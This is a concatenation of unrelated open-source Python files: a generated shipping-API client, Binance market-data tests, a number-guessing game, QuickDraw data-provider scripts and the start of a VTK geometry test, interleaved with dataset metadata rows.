'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['data'] = \
data
return self.buy_label_endpoint.call_with_http_info(**kwargs)
def cancel_pickup(
self,
carrier_name,
data,
**kwargs
):
"""Cancel a pickup # noqa: E501
Cancel a pickup previously scheduled # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_pickup(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (PickupCancelRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test.. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OperationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.cancel_pickup_endpoint.call_with_http_info(**kwargs)
def fetch_rates(
self,
data,
**kwargs
):
"""Fetch shipment rates # noqa: E501
The Shipping process begins by fetching rates for your shipment. Use this service to fetch the shipping rates available. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetch_rates(data, async_req=True)
>>> result = thread.get()
Args:
data (RateRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): if True, return only the response data, without the HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
RateResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['data'] = \
data
return self.fetch_rates_endpoint.call_with_http_info(**kwargs)
def schedule_pickup(
self,
carrier_name,
data,
**kwargs
):
"""Schedule a pickup # noqa: E501
Schedule one or many parcels pickup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schedule_pickup(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (PickupRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): if True, return only the response data, without the HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PickupResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.schedule_pickup_endpoint.call_with_http_info(**kwargs)
def track_shipment(
self,
tracking_number,
carrier_name,
**kwargs
):
"""Track a shipment # noqa: E501
You can track a shipment by specifying the carrier and the shipment tracking number. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.track_shipment(tracking_number, carrier_name, async_req=True)
>>> result = thread.get()
Args:
tracking_number (str):
carrier_name (str):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): if True, return only the response data, without the HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
TrackingResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tracking_number'] = \
tracking_number
kwargs['carrier_name'] = \
carrier_name
return self.track_shipment_endpoint.call_with_http_info(**kwargs)
def update_pickup(
self,
carrier_name,
data,
**kwargs
):
"""Update a pickup # noqa: E501
Modify a scheduled pickup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pickup(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (PickupUpdateRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): if True, return only the response data, without the HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PickupResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.update_pickup_endpoint.call_with_http_info(**kwargs)
def void_label(
self,
carrier_name,
data,
**kwargs
):
"""Void a shipment label # noqa: E501
Cancel a shipment and the label previously created # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.void_label(carrier_name, data, async_req=True)
>>> result = thread.get()
Args:
carrier_name (str):
data (ShipmentCancelRequest):
Keyword Args:
test (bool, none_type): The test flag indicates whether to use a carrier configured for test. [optional] if omitted the server will use the default value of False
_return_http_data_only (bool): if True, return only the response data, without the HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OperationResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['carrier_name'] = \
carrier_name
kwargs['data'] = \
data
return self.void_label_endpoint.call_with_http_info(**kwargs)
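# A minimal sketch (hypothetical helper, not part of the generated client):
# every method above re-applies the same keyword defaults by hand before
# delegating to its endpoint, so that boilerplate could be centralized.

```python
# Hypothetical helper names (_CALL_DEFAULTS, apply_call_defaults) — assumed,
# not part of the generated API. Defaults mirror the kwargs.get(...) calls above.
_CALL_DEFAULTS = {
    'async_req': False,
    '_return_http_data_only': True,
    '_preload_content': True,
    '_request_timeout': None,
    '_check_input_type': True,
    '_check_return_type': True,
    '_spec_property_naming': False,
    '_content_type': None,
    '_host_index': None,
}

def apply_call_defaults(kwargs):
    """Return kwargs with the standard per-request defaults filled in;
    any value supplied by the caller takes precedence."""
    merged = dict(_CALL_DEFAULTS)
    merged.update(kwargs)
    return merged
```

With such a helper, each method body would reduce to merging its positional
arguments into kwargs and calling `call_with_http_info(**apply_call_defaults(kwargs))`.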
#!/usr/bin/env python3
# File: src/tests/client/endpoints/test_market.py (repo: rvillebro/binance, license: MIT)
import pytest
from typing import TYPE_CHECKING
from pydantic import ValidationError
if TYPE_CHECKING:
from binance.client import Client
def test_aggregated_trades(client: 'Client'):
func = client.market.aggregated_trades
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT')
assert response.status == 200
response = func(symbol='BTCUSDT', limit=1)
assert response.status == 200
from_id = response.data[0]['a']
response = func(symbol='BTCUSDT', fromId=from_id, limit=1)
assert response.status == 200
start_time = response.data[0]['T']
end_time = start_time + 1
response = func(symbol='BTCUSDT', fromId=from_id, startTime=start_time)
assert response.status == 200
response = func(symbol='BTCUSDT', fromId=from_id, endTime=end_time)
assert response.status == 200
response = func(symbol='BTCUSDT',
fromId=from_id,
startTime=start_time,
endTime=end_time)
assert response.status == 200
def test_klines(client: 'Client'):
from binance.enums.binance import KlineInterval
func = client.market.klines
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_continues_contract_klines(client: 'Client'):
from binance.enums.binance import ContractType, KlineInterval
func = client.market.continues_contract_klines
with pytest.raises(ValidationError):
func()
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(pair='BTCUSDT',
contractType=ContractType.PERPETUAL,
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_index_price_klines(client: 'Client'):
from binance.enums.binance import KlineInterval
func = client.market.index_price_klines
with pytest.raises(ValidationError):
func()
response = func(pair='BTCUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(pair='BTCUSDT', interval=KlineInterval.ONE_MINUTE, limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(pair='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(pair='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(pair='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_mark_price_klines(client: 'Client'):
from binance.enums.binance import KlineInterval
func = client.market.mark_price_klines
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_mark_price(client: 'Client'):
func = client.market.mark_price
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_funding_rate_history(client: 'Client'):
func = client.market.funding_rate_history
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT')
assert response.status == 200
start_time = response.data[0]['fundingTime']
end_time = start_time + 1
response = func(symbol='BTCUSDT', startTime=start_time)
assert response.status == 200
response = func(symbol='BTCUSDT', endTime=end_time)
assert response.status == 200
response = func(symbol='BTCUSDT', startTime=start_time, endTime=end_time)
assert response.status == 200
def test_ticker_price_change_statistics(client: 'Client'):
func = client.market.ticker_price_change_statistics
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_ticker_price(client: 'Client'):
func = client.market.ticker_price
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_ticker_order_book(client: 'Client'):
func = client.market.ticker_order_book
response = func()
assert response.status == 200
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_open_interest(client: 'Client'):
pytest.skip("not working at the moment")
func = client.market.open_interest
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT')
assert response.status == 200
def test_open_interest_history(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.open_interest_history
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_top_long_short_account_ratio(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.top_long_short_account_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_top_long_short_position_ratio(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.top_long_short_position_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_global_long_short_account_ratio(client: 'Client'):
pytest.skip()
from binance.enums.binance import Period
func = client.market.global_long_short_account_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_taker_long_short_ratio(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import Period
func = client.market.taker_long_short_ratio
with pytest.raises(ValidationError):
func()
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES)
assert response.status == 200
response = func(symbol='BTCUSDT', period=Period.FIFTEEN_MINUTES, limit=1)
assert response.status == 200
startTime = response.data[0]['timestamp']
endTime = startTime + 1000
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
endTime=endTime)
assert response.status == 200
response = func(symbol='BTCUSDT',
period=Period.FIFTEEN_MINUTES,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_lvt_klines(client: 'Client'):
pytest.skip("not working at the moment")
from binance.enums.binance import KlineInterval
func = client.market.lvt_klines
with pytest.raises(ValidationError):
func()
response = func(symbol='BLZUSDT', interval=KlineInterval.ONE_MINUTE)
assert response.status == 200
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
limit=1)
assert response.status == 200
startTime = response.data[0][0]
endTime = startTime + 1000
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime)
assert response.status == 200
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
endTime=endTime)
assert response.status == 200
response = func(symbol='BLZUSDT',
interval=KlineInterval.ONE_MINUTE,
startTime=startTime,
endTime=endTime)
assert response.status == 200
def test_composite_index_info(client: 'Client'):
func = client.market.composite_index_info
response = func()
assert response.status == 200
response = func(symbol='DEFIUSDT')
assert response.status == 200
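# The kline-style tests above all probe the same limit/startTime/endTime
# combinations. A hedged sketch of a shared helper that could parametrize
# them (`window_params` is an assumed name, not part of the binance package):

```python
def window_params(first_ts, span_ms=1000):
    """Build the time-window kwarg combinations the tests above repeat.

    `first_ts` is the timestamp read from the first row of a limited
    response; the default 1000 ms span matches the `startTime + 1000`
    pattern used throughout the tests.
    """
    start, end = first_ts, first_ts + span_ms
    return [
        {'startTime': start},
        {'endTime': end},
        {'startTime': start, 'endTime': end},
    ]
```

Each test could then loop `for extra in window_params(startTime): func(symbol='BTCUSDT', interval=..., **extra)` instead of spelling out the three calls.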
# File: GuessingGame.py (repo: aatrey56/guessing-game, license: MIT)
import random
def play():
    """Run one round: the player has 7 attempts to find a number in 1..100."""
    print("Hi! I'm thinking of a random number between 1 and 100.")
    print()
    guessing_num = random.randint(1, 100)
    for attempt in range(1, 8):
        print("--- Attempt " + str(attempt))
        guessed_num = int(input("Guess what number I am thinking of: "))
        if guessed_num == guessing_num:
            print("WINNER!!!!!!")
            print("The number was " + str(guessing_num))
            return
        elif guessed_num < guessing_num:
            print("Too low")
        else:
            print("Too high")
        print()
    print("Aw, you ran out of tries. The number was " + str(guessing_num) + ".")

# The original duplicated the whole game body for a single replay; a loop
# removes the duplication and lets the player replay as often as they like.
play()
while input("Do you want to play again, yes or no? ") == "yes":
    play()
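# Why the game grants exactly 7 attempts: binary search over 1..100 needs at
# most ceil(log2(101)) = 7 guesses, so a careful player can always win. A small
# sketch (hypothetical helper, not part of the game) demonstrating that bound:

```python
def binary_guess(secret, low=1, high=100):
    """Return how many guesses binary search takes to find `secret` in [low, high]."""
    guesses = 0
    while True:
        guesses += 1
        mid = (low + high) // 2  # always guess the midpoint
        if mid == secret:
            return guesses
        if mid < secret:
            low = mid + 1   # "Too low" -> discard the lower half
        else:
            high = mid - 1  # "Too high" -> discard the upper half
```

Running this for every secret in 1..100 confirms no secret ever needs more than 7 guesses.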
# File: quickdraw_data_provider_short_test_script.py (repo: choobea/quickdraw_mlp, license: BSD-3-Clause)
from data_providers import QuickDrawImageDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
train_data = QuickDrawImageDataProvider(which_set="train", batch_size=batch_size, rng=rng, num_classes_use=100)
val_data = QuickDrawImageDataProvider(which_set="valid", batch_size=batch_size, rng=rng, num_classes_use=100)
test_data = QuickDrawImageDataProvider(which_set="test", batch_size=batch_size, rng=rng, num_classes_use=100)
from data_providers import QuickDrawStrokeDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
from data_providers import QuickDrawCombinedDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
val_data = QuickDrawCombinedDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
from data_providers import QuickDrawCombinedDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
train_data = QuickDrawCombinedDataProvider(which_set="train", batch_size=batch_size, rng=rng)
train_data = QuickDrawStrokeDataProvider(which_set="train", batch_size=batch_size, rng=rng)
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
test_data = QuickDrawStrokeDataProvider(which_set="test", batch_size=batch_size, rng=rng)
from data_providers import QuickDrawStrokeDataProvider
import numpy as np
rng = np.random.RandomState(seed=0) # set seed
batch_size = 100
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
train_data = QuickDrawStrokeDataProvider(which_set="train", batch_size=batch_size, rng=rng)
val_data = QuickDrawStrokeDataProvider(which_set="valid", batch_size=batch_size, rng=rng)
test_data = QuickDrawStrokeDataProvider(which_set="test", batch_size=batch_size, rng=rng)
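# The script above constructs each provider split with an identical call. A
# hedged sketch of a loop-based alternative (`make_providers` is an assumed
# name, not part of the quickdraw_mlp repo):

```python
import numpy as np

def make_providers(provider_cls, batch_size=100, seed=0, **kwargs):
    """Build train/valid/test providers sharing one seeded RNG, mirroring
    the repeated constructor calls in the script above."""
    rng = np.random.RandomState(seed=seed)
    return {
        which: provider_cls(which_set=which, batch_size=batch_size, rng=rng, **kwargs)
        for which in ("train", "valid", "test")
    }
```

For example, `make_providers(QuickDrawImageDataProvider, num_classes_use=100)` would replace the first three constructor calls in the script.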
# File: params_proto/__init__.py (repo: episodeyang/params_proto, license: BSD-3-Clause)
from . import hyper
from . import neo_hyper
from . import neo_proto
from . import utils
from .params_proto import *
| 16.714286 | 27 | 0.769231 | 18 | 117 | 4.833333 | 0.388889 | 0.45977 | 0.344828 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 117 | 6 | 28 | 19.5 | 0.90625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
1b396d9552c39dd9a08ec412aec798fbb202e0c1 | 9,482 | py | Python | IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/KlineBottle.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 4 | 2019-05-30T01:52:12.000Z | 2021-09-29T21:12:13.000Z | IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/KlineBottle.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | null | null | null | IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/KlineBottle.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 2 | 2019-08-30T23:36:13.000Z | 2019-11-08T16:52:01.000Z | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
points = vtk.vtkPoints()
points.InsertNextPoint(0,-16,0)
points.InsertNextPoint(0,0,-14)
points.InsertNextPoint(0,0,14)
points.InsertNextPoint(14,0,0)
points.InsertNextPoint(10,20,-10)
points.InsertNextPoint(10,20,10)
points.InsertNextPoint(10,-20,-10)
points.InsertNextPoint(10,-20,10)
points.InsertNextPoint(-10,-20,-10)
points.InsertNextPoint(-10,-20,10)
points.InsertNextPoint(-10,20,-10)
points.InsertNextPoint(-10,20,10)
points.InsertNextPoint(-2,27,0)
